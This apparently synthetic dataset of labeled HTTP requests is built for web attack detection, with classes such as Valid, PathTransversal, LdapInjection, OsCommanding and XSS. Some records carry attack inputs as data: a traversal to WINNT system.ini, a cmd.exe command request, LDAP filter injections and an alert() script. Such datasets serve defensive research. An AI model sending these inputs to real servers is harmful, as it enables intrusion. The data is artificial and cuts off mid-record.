Max-Forwards: 273
MIME-Version: 5.9
Pragma: cba1ri='cro4S'
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: Basic OGRkbGRoaTpoYWp5Zg==
Range: -54670
Referer: http://g0jyns.org/2tne6o2/siolljhm/oursntf/hedyx.png
TE: trailers,chunked;q=0.7,trailers
Trailer: From
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 8.2; ao-ec; rv:0.9.8) Gecko/87521888
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2292x8708
Via: 5.3 123.205.56.235, FTP/8.2 www.4nsaei.js:79104
Transfer-Encoding: compress
Upgrade: ntyhts/3.8
Warning: 232 www.AlaosaP.html "peaiso" "Tue, 27 Oct 09 21:12:39 CET"
X-Forwarded-For: 236.194.223.102
X-Serial-Number: 11088084368938751
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44
Start - Id: 7227
class: Valid
POST /tx0soi3_B8/lRincludeqAfB/tsNsteeeode/o7e.mdb? HTTP/1.0
Content-Length: 269
Content-Language: rpc
Content-Encoding: compress
Content-Location: http://aoEkATha.ch/zs9oD2e.sh
Content-MD5: ZnRjaWVzTmlzdGNvc3BzUg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 24:40:17 GMT
Last-Modified: Tue, 30 Mar 04 14:49:34 CET
Host: 145.117.58.156:80
Connection: gentdidu
Accept: video/*;q=0.9, application/postscript;q=0.9
Accept-Charset: x-mac-greek, windows-1251, windows-1255, x-mac-japanese, us-ascii;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: max-stale=144
Client-ip: 83.132.90.202
Cookie: TmY=09;Ao3t0rtnyt=f39r+;ircwssgndlnoied=cF3KgL09
Cookie2: $Version="340"
Date: Thu, 18 Sep 08 01:30:15 CET
ETag: W/"CXAljVW.aYONgno@TIm"
Expect: rri96osu
From: seKsui5@tneeaatdac.fr
If-Modified-Since: Thu, 15 Sep 05 05:28:16 GMT
If-Unmodified-Since: Mon, 15 Mar 04 17:24:02 UTC
If-Match: *
If-None-Match: "XfVq3qNuQ9TJ7lqIs"
If-Range: Tue, 03 Nov 09 04:11:50 CET
Max-Forwards: 4
MIME-Version: 6.6
Pragma: S=olequu
Proxy-Authorization: Basic ZHV0dTpvUWR0U3o=
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: http://www.Mhymxks.ch/hetht.jsp
TE: trailers,trailers,chunked;q=0.3
Trailer: Range
User-Agent: E3AFuAnp (0-j1jaMyt0; h5b0YdN_ac; tJInU_q9; m9yEFlMnW)
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: HTTP/6.7 74.155.138.253:415, 4.5 140.140.169.177
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 94.164.69.87
X-Serial-Number: 35067124458
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-KOIvSOrw=692740&e2ceetqIjee7lkd=enrm \rnIcrhn:ee|-h&7rtT4XfV@iframe=6460&Asngssori=daha&bnaff3tIit=35&rb=t&se8nVmaa0trm=roYj&tnF36icEaeeSre=39&ti=5450&bYCV4D-P=h9ii7Boes5i&leXiyc=dEsaut&pnn7rqiqh3hht=chK@S4RC3j8@&lTo96hbt=ryr@&iUtupsis5lo2tEp=ateni0opa05l0

End - Id: 7227
Start - Id: 24190
class: Valid
GET /hx2/Edt9indngamit/Ecd8FIeTimwstO/xXBjj1W@gIwgety95/t4/dpjTz4YuZeY.dll? HTTP/1.1
Host: www.koNeqb8aU.be
Connection: rneddtAd
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=95106
Client-ip: 240.233.81.94
Cookie: 6s8LpshutdownWdh@CC=ojausegpq2bii
Cookie2: $Version="38"
Date: Sat, 03 Oct 09 06:28:36 UTC
ETag: "78o.maQvdTLSGjt"
Expect: 100-continue
From: vktxen@eejuti.biz
If-Modified-Since: Sat, 18 Dec 04 12:30:22 UTC
If-Unmodified-Since: Mon, 30 Apr 07 10:09:33 GMT
If-Match: *
If-None-Match: "HnN7kA@K-@jx8IwDC"
If-Range: "PCOZOay2B4OHc9MODwy"
Max-Forwards: 75
MIME-Version: 1.4
Pragma: mtwSots7=cT
Proxy-Authorization: tiea eyfn=erdlElt
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: http://Pnoiroa.gov/oou4neal/henn/serhe.asmx
TE: trailers,gzip
Trailer: Range
User-Agent: hrqhPhmH5 http://www.tlvrepg.be
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: deflate
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 211.126.227.104
X-Serial-Number: 53913
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24190
Start - Id: 45579
class: PathTransversal
GET /oPrAF-Q/tbdtrdgei.sh?pe=v%2Fd%5Cs9a&hdrfntmlq5=219893&ejlsne9wahise=227267244&esoin9reha3=t65&4QxF@fP5CObin@=3&marddHlisu=e2uisd&ahno0nzt=sFxjyh&sTsyi=7974908&tsfhnCxsthwpti=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&ate43eji6hp=d9ldIg2f&zsorenaoSledt=aa&ob9s0rAyatctA=m9dafstm6aegn&fe=tpasswd HTTP/1.1
Host: www.s0tosurtr.com:80
Connection: Verfh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.4, compress;q=0.0, gzip, deflate;q=0.8, identity;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="606"
Date: Sun, 26 Oct 08 22:59:16 UTC
ETag: "7BJnOXhoOC90uhha"
Expect: 100-continue
From: wtdlbok@elsFbheed.st
If-Modified-Since: Tue, 15 Jul 08 02:37:36 GMT
If-Unmodified-Since: Thu, 29 Nov 07 16:26:04 UTC
If-Match: *
If-None-Match: *
If-Range: "qadOgr081xmbst5CH@m"
Max-Forwards: 1
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: 286-378831
Referer: http://www.eHbhaa.biz/bRoaruey/tdte.mdb
TE: chunked,gzip,trailers
Trailer: Upgrade
User-Agent: b0enftqy0dr2nstnag
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45579
Start - Id: 4741
class: Valid
POST /lo/jIstyle2/rGmdADKmH/m0VCrv2WJCVuHec.X2/QDpositionHjQunion/cO2cXlaQ/suip9aioftLSsR8t/eYsIPa-V.html? HTTP/1.1
Content-Length: 84
Content-Language: 6
Content-Encoding: identity
Content-Location: http://aena.gov/fBkyhs/srkc/jrNelfm/nat0/haodHej.nsf
Content-MD5: bHZpNXJwdHVtY3RFZ2FvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Sep 04 08:33:57 GMT
Last-Modified: Thu, 30 Jul 09 08:33:53 UTC
Host: 57.141.131.126
Connection: keep-alive
Accept: text/*;q=0.0, text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, compress, compress;q=0.8, compress;q=0.2, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 187.93.251.175
Cookie: q0tilsdw7twu3=y1Smis;id62l=7
Cookie2: $Version="84"
Date: Fri, 02 Oct 09 15:32:54 UTC
ETag: "vbYEaKVZD_zcfIUAV"
Expect: e2gZ
From: oetmfrha@shu54hnaa4.uk
If-Modified-Since: Mon, 31 Jul 06 12:47:09 UTC
If-Unmodified-Since: Wed, 12 Nov 08 05:38:58 CET
If-Match: "KAVpVe0LQi9uBV-GQW0F"
If-None-Match: *
If-Range: Mon, 07 Nov 05 02:39:48 GMT
Max-Forwards: 36
MIME-Version: 6.2
Pragma: oms=8qlpwhod
Proxy-Authorization: Digest opaque="rll9"
Authorization: Basic Mm9lbjpUcnJ5MA==
Range: 036-,9447-
Referer: /eo3ftne/ncnee/d5m2o5rH.aspx
TE: gzip,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.8 (Windows; U; WinNT 9.0; hA-ao; rv:2.6.4) Gecko/65600491
UA-CPU: MIPS
UA-Disp: 377,5195,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4366x138
Via: nrp/5.7 253.48.52.28, FTP/0.6 27.61.238.163
Transfer-Encoding: identity
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 956 24.210.177.89 "qt9hoeeRnsan5aor" "Sat, 30 Sep 06 12:08:47 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 07250017446349545353
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bFautoexecu2sE=36029&lri8esaeEcao=zy9&sb37igrrtmmuna=iua&zr=c;&nlVerFaNhD8=3163625

End - Id: 4741
Start - Id: 20717
class: Valid
GET /tLsehoraEosECp/llvN/8b5/l28/hiieeelsci/mqthiheb/s5lvakQpCC0G8h1U0F.jsp? HTTP/1.1
Host: www.e6mnemGmhe.st:87505
Connection: keep-alive
Accept: image/*;q=0.7, application/*, application/*;q=0.1
Accept-Charset: iso-8859-8;q=0.1, windows-1252;q=0.2, macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 59.230.197.81
Cookie: nw5duein=e+;vetlheeht2usn=ii ae)jr;flh=73901
Cookie2: $Version="0"
Date: Wed, 19 Dec 07 12:40:10 UTC
ETag: "XCfTQ8sYzPf8E@3jCGX"
Expect: fsatzel
From: mupderg@gn978yed5.fr
If-Modified-Since: Mon, 07 Jun 04 17:03:16 GMT
If-Unmodified-Since: Thu, 09 Jul 09 19:49:51 GMT
If-Match: "niBPw-co_9shziqdU1I"
If-None-Match: *
If-Range: "4C7Y_57OlkY5LvU"
Max-Forwards: 043
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: aoEk enerNiq6=iobctBge
Range: 15-,71-,5-
Referer: http://www.cvfw.biz/Yt3uara1/oMcld/ahtx.php
TE: chunked;q=0.5,chunked,trailers
Trailer: Authorization
User-Agent: eao-2Fv0 http://www.meg8.be
UA-CPU: MIPS
UA-Disp: 4030,457,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: Acien/6.3 www.tRwCsUne.tiff, 7.9 123.3.95.52:8
Transfer-Encoding: compress
Upgrade: 3tlgha/2.3
Warning: 191 www.wieantnn.js "ceso9ieb2g3sfseiu" "Mon, 18 Oct 04 12:22:32 UTC"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20717
Start - Id: 38171
class: LdapInjection
GET /ngh3/89RCA_JtV/on/artrI/ae/mGZW/hirreodhB/nY.3/F5VlYSRrDy5dF/8nxoeaui9be/Kyqlu.jpeg?nTw7V=imSALqE_5&lsh26e2irexai=%29++++%28++%7C+%28++++cn%3D*o++%27brien*++++%29%28mail++%3D*o++%27brien*%29 HTTP/1.1
Host: 157.53.232.15
Connection: close
Accept: audio/x-wav, text/html;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: satnHeal-babuie, wrqne-e2ucaica, rtha-Dtjo;q=0.6, ao5a7ldn-totr, ctepoDa-Y1waaaAm;q=0.0
Cache-Control: min-fresh=8
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="5"
Date: Mon, 03 Aug 09 04:04:51 CET
ETag: "VttqQ6PbSrQIFWIR0Z"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 19:04:29 UTC
Max-Forwards: 626
MIME-Version: 5.5
Pragma: rntsl=ie4E
Proxy-Authorization: Basic Z3JzYXNlMDplb2hzNWtxZA==
Authorization: Digest opaque="apo2Yo"
Range: -58269,-622
Referer: http://coatet.biz/cms0t/py3onxum.zip
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: tleL (uxofzx1)
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 411x727
Via: 5.8 17.83.235.142, 3.2 117.87.41.173, FTP/1.8 174.112.172.23
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38171
Start - Id: 13051
class: Valid
GET /ZaTst4On5easFct.cfm? HTTP/1.0
Host: www.e0ih.ch
Connection: ptoef
Accept: text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-krea;q=0.1, twA2st-fhshtgea, 6sfLrPs-lyEe;q=0.9
Cache-Control: no-transform
Client-ip: 215.148.83.171
Cookie: RYRlpJTB=beitla
Cookie2: $Version="1"
Date: Thu, 25 Sep 08 22:48:41 CET
ETag: "0NYhP@s3v_s7e@Exd"
Expect: 100-continue
From: bitj@a9rdso.be
If-Modified-Since: Thu, 05 Nov 09 11:25:59 UTC
If-Unmodified-Since: Thu, 02 Jul 09 06:23:14 UTC
If-Match: "1vtbHW@uCo64sT_"
If-None-Match: *
If-Range: Mon, 01 Feb 10 10:23:31 CET
Max-Forwards: 1
MIME-Version: 8.1
Pragma: lra=bn7L
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Digest nc=eB5F2312
Range: 309-6,-2
Referer: http://www.eworacl.cz/tw8Qzbko/eyigto/elucoY5.exe
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.3 (X11; U; Linux i586 2.1; ee-iq; rv:5.8.9) Gecko/31299600
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 011x9947
Via: HTTP/2.9 www.aoOneomc.jpeg, 3.3 111.33.125.159:99194, HTTP/2.2 237.253.252.157:55867
Transfer-Encoding: aveu; 7tom=rr8jotmr
Upgrade: uede/9.7
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 68.38.52.84
X-Serial-Number: 11062
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13051
Start - Id: 28977
class: Valid
GET /98lUtelnethtaccesT0Wu1/sUGnmwe.i5x6Ln1Vm/nejkoatpooft/rlt/x.x7aH8U5lP@b/aT2OuQu-39E/ywxCP/LoI5gscriptpb7j/difIf/trrcbhetgsilr/lw.css? HTTP/1.1
Host: www.aebrtb.gov
Connection: H1eoe
Accept: video/quicktime;q=0.1, application/*, video/quicktime;q=0.3
Accept-Charset: us-ascii, cp-932, windows-1257, iso-2022-jp, x-mac-hebrew;q=0.7
Accept-Encoding: 
Accept-Language: tcIberm-rheb
Cache-Control: only-if-cached
Client-ip: 15.156.44.232
Cookie: eH5FzJl=8800;3rsiafyaM2legE0=2
Cookie2: $Version="113"
Date: Thu, 15 Feb 07 19:57:05 CET
ETag: "6W6lizwmf3Sl4Tos"
Expect: cazeea
From: hthNw@xsshl3roat.ch
If-Modified-Since: Thu, 06 Dec 07 24:24:54 CET
If-Unmodified-Since: Sat, 17 Sep 05 09:45:25 GMT
If-Match: "KdnPbZEqh4Q7EnQAS8"
If-None-Match: *
If-Range: Mon, 28 Jan 08 11:23:18 CET
Max-Forwards: 40
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic MW0ydzphaWR1cg==
Range: -48236,695-,-4
Referer: /lstn/eneea/jecltrer.php3
TE: chunked;q=0.2
Trailer: If-None-Match
User-Agent: dzzHKatrsOlsreCea3ci
UA-CPU: Sparc
UA-Disp: 7483,031,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1053x1221
Via: 4.6 www.ruTislH.html
Transfer-Encoding: compress
Upgrade: W9cH/4.8, tlo/3.6, osrpo/7.5, hDTh/5.0, 4Lotcm/6.0
Warning: 204 www.feVfei0.jpeg "oefabaeaEvrhah4mh" "Fri, 18 Apr 08 10:02:34 GMT"
X-Forwarded-For: 175.191.83.87
X-Serial-Number: 055751373307057
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28977
Start - Id: 36514
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.csosRE.de:80
Connection: close
Accept: application/*, video/*;q=0.3, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: onsal181-urmmlAD;q=0.4, nn4h-drren, i7uihtvq-ir6, aqw-i
Cache-Control: min-fresh=99
Client-ip: 138.104.69.2
Cookie: wRR8hdropnLE=33o;SIYTtt4f-=96;UGlYCpm= pschildhlincludesosonullorcp;nzTtfI=&v eRi~;nntWthsu=su;lstoltOsEiyih=9798
Cookie2: $Version="50"
Date: Wed, 03 Sep 08 02:35:44 UTC
ETag: "1JyJiea6NiTkziWUK"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Thu, 25 Aug 05 20:27:25 UTC
If-Match: "lwECCqPtth.J3ClJuJ"
If-None-Match: *
If-Range: *
Max-Forwards: 3924
MIME-Version: 8.5
Pragma: 0bcya='8ira'
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM NzdyNnRvcmFiYTJhdHNvZGxheG5tbmVzb2ltbmtpaUV4dXhvcmFpcw==
Range: 7303-,26337-
Referer: http://don1.biz/dmmllott/t9pneal/9meh/hatRru.jsp
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 0.0; wn-sW; rv:0.9.6) Gecko/65977380
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9877x8489
Via: FTP/9.5 www.bth5n.jpg, 8.5 www.teEd5.html, 2.5 130.222.178.34
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36514
Start - Id: 48106
class: XSS
GET /icvq/Aadusi4eoerct1sdJeiC/2wL0fv/yhcdrtM/iQU8/a4uelptogee9csao/nHJZOgd-ao30QUE0WNt./abrQOweQ2gr1i/rbl4eajtpukoa8m.html?WoiTrao19=tJuqDKFn&xtrre=052563&y0ayiCMin=3tt&Rce5vbs19a=9&Fno=%26%7B%5Balert++%28%27ruh%27%29%3B%5D%7D%3B HTTP/1.0
Host: www.ltdsCec.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-tw, shift_jis;q=0.1
Accept-Encoding: 
Accept-Language: yoec-tedovsck;q=0.6, eh-odnae
Cache-Control: only-if-cached
Client-ip: 182.252.28.208
Cookie: UfEy=lr'6cqzumirsUAa
Cookie2: $Version="6"
Date: Fri, 17 Dec 04 14:25:21 GMT
ETag: W/"Ye9JslPaDRE@RzhFI"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Sat, 15 Oct 05 11:23:08 GMT
If-Unmodified-Since: Sat, 08 Oct 05 06:39:20 CET
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ny9cr sjeOhe=rf9a
Range: -913822,250-
Referer: http://E2Ipr.com/qHtai/eiot1/e6iFF/uArd/ueg8o.tar
TE: trailers
Trailer: Accept-Charset
User-Agent: bgyrte/4.2
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: 1.7 www.ruyxtw.css:88
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48106
Start - Id: 4639
class: Valid
POST /ncCvBKXF@SHZZ0AaQyxO/ci.yP3NjbnXh6_q/ptxbt.exe? HTTP/1.0
Content-Length: 231
Content-Language: Dtu
Content-Encoding: identity
Content-Location: /xolgb.pl
Content-MD5: dTBudHJtcGZyZXRxYVVuNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Mar 10 21:31:44 UTC
Last-Modified: Fri, 02 Apr 10 02:56:00 CET
Host: www.h0ats.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=3383
Client-ip: 190.131.207.158
Cookie: ljdoh='trgo;i_4J3k=EeetNs
Cookie2: $Version="4"
Date: Sat, 17 Feb 07 15:54:55 CET
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 100-continue
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Tue, 06 Apr 04 17:32:06 GMT
If-Unmodified-Since: Fri, 12 Sep 08 15:00:40 CET
If-Match: *
If-None-Match: *
If-Range: "T57WEuKPaJdmjIqBWzCk"
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vsltae"
Authorization: Digest realm
Range: 232-0,-44178
Referer: /eoh6.jsp
TE: trailers,deflate
Trailer: Via
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 5.7; io-2y; rv:4.8.9) Gecko/24169430
UA-CPU: 68000
UA-Disp: 984,729,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0964x700
Via: HTTP/9.9 www.btmeKauN.htm, HTTP/6.4 www.zanpe.shtml
Transfer-Encoding: deflate
Upgrade: dea/8.9
Warning: 256 www.p3oc7si.html "erzAiotceQ" "Fri, 17 Jul 09 03:33:05 UTC"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

mre=admin2qn&oewlri1=annaeonsaNrrthp&wrIaf7oade=68929947&0e2ftnrbu7=[:rcNdjm&satvnhttefnrt=eroseee0e&aaT=gs27ukaG&se=857794&Ae=melgserabzanj9&rseeer7a5sidoo=tdyaeftPoineoc&2mhfgH6ira= <ni%ef-&s-YKselectSli7pq=d8Ro&ErHlc=767

End - Id: 4639
Start - Id: 37293
class: LdapInjection
PUT /eVQpyLqv-/a-ijBf2wls.sutX3LeV/iu0lSnSj/sfh.msf? HTTP/1.1
Content-Length: 251
Content-Language: ie
Content-Encoding: identity
Content-Location: http://n4eieaye.gov/Loooqi/w9eotoo/emrsoaA.avi
Content-MD5: TXJhb3Fjb3MyZndrRWxleQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Jun 05 13:23:41 UTC
Last-Modified: Mon, 17 Apr 06 12:52:56 CET
Host: 88.186.5.16:7
Connection: keep-alive
Accept: audio/*, image/*;q=0.9, video/*;q=0.0
Accept-Charset: windows-1252, iso-2022-jp, x-mac-korean;q=0.4, iso-8859-8, windows-874
Accept-Encoding: deflate;q=0.0, gzip;q=0.6, gzip;q=0.5, identity, compress;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 247.81.26.33
Cookie: Ggmdorhse=486;E1betweenH3_ll3iJ=famo)( |  (bp=*);nyNearjnmssupn9=hbeecai\6;2DEtmpHqYjyX6=eJoq@T8lP
Date: Tue, 10 Mar 09 21:36:54 CET
ETag: W/"8qID0e2dzvt9K_cBtD"
From: 6a7ya@jemrd3lro.org
If-Modified-Since: Tue, 16 Jun 09 20:17:58 CET
If-Range: Fri, 13 May 05 10:53:14 UTC
Max-Forwards: 4
MIME-Version: 9.4
Referer: http://hidelihs.cz/aSji/ahp9/nsoalt5i/e6Twor.mdb
User-Agent: Mozilla/0.1 (compatible; Konqueror/6.9; Win 9x; htqueh)
UA-CPU: x86
Via: ayna/5.1 www.IcNal.tiff, HTTP/0.8 40.160.35.96:0, 0.0 189.204.75.174:7
Transfer-Encoding: gzip
X-Serial-Number: 5452220594999212344
----: ---------------------

ltefcn=6&hdEctEp=arnldosfdh&0delete1j8ywobject=(rhjTxfwfO3l&gRe2hdtsAcao=nodivi&5eCahomweXrndT=5Zba9uWv&Doqaa=]yi|Taed7ih&aRteu=8&wIautoexecDMom4Vf6=i(lmvhjeaheEtorhz|h &tqf=lnodebs&heo=8nsmsuncCarpdtIo&Uefehroos=5983516&ao8fxrili2ttdn=55646

End - Id: 37293
Start - Id: 27745
class: Valid
GET /T9hahdwtaxraHSa/nlurFsivnrluslye/dulCl/9ezsltds/gldtlt/iw3bPs.php?MQTZnQmITa=nkc.tLT582T&stm5e=wtformtzhttp+qsafeeieet&ailmmnh2=n0b&lmljey=ezHFITjDi&etcPPoGphZsam=rertnt5iambznrnsj9&aomltgn=40896 HTTP/1.1
Host: 57.195.101.127
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate;q=0.3, deflate
Accept-Language: *
Cache-Control: min-fresh=92
Client-ip: 218.67.222.228
Cookie: 8oEehlAncohn=zr3)oMerml=l@wrz' ;siEioiedb=rclofb;n9wyCMVIsadminG=nye5.4;3zjEH3zdropy38B=nl-ebupdateys;Ettoivi=e0pUDp4fV
Cookie2: $Version="92"
Date: Wed, 08 Apr 09 07:11:56 GMT
ETag: "hP6VFLNv.5ogTM8"
Expect: nsiuii=vEscmbj
From: h4teemei@eoygwhlTei.gov
If-Modified-Since: Fri, 16 Sep 05 21:37:21 CET
If-Unmodified-Since: Fri, 03 Nov 06 15:06:19 UTC
If-Match: *
If-None-Match: "A.rOGStvqoG0jm.r"
If-Range: Sat, 10 Jul 04 03:53:55 GMT
Max-Forwards: 2
MIME-Version: 2.1
Pragma: eier=ie
Proxy-Authorization: Digest response="Abe3253d1deC7B4E074f8bc3CD77D6e8"
Authorization: ekg1s lchaffa3=iedira
Range: 257-
Referer: /Nehg/afj5e4r.png
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: mcW34z http://www.emtiune.be
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 483x5740
Via: 5.4 247.174.65.243, 6.9 www.nphc.png:4, FTP/0.5 130.131.111.10
Transfer-Encoding: nita
Upgrade: vebunl/5.1
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27745
Start - Id: 4371
class: Valid
POST /Lezlx/1hbg4UyY_52-ij0Oh/sqd_rOd4a/hnra5.mspx? HTTP/1.1
Content-Length: 93
Content-Language: tayinCos,lgaco2gW,hhQeatey
Content-Encoding: compress
Content-Location: http://www.jnutken.net/ienU7/tChoj0t/aoevr3/Hsobu/tioERRst.php
Content-MD5: aGlhdWtvdG95ZWlubGxhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Jan 10 18:22:26 CET
Last-Modified: Thu, 17 Jan 08 09:17:22 GMT
Host: www.oeae0egSe.com
Connection: keep-alive
Accept: image/png, application/*;q=0.9, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: min-fresh=88105
Client-ip: 101.72.90.108
Cookie: de=IeqkR6;ytiadtR=n;K7pmetasS_orrF7=x;iZrRUJ048F=rnEig3t
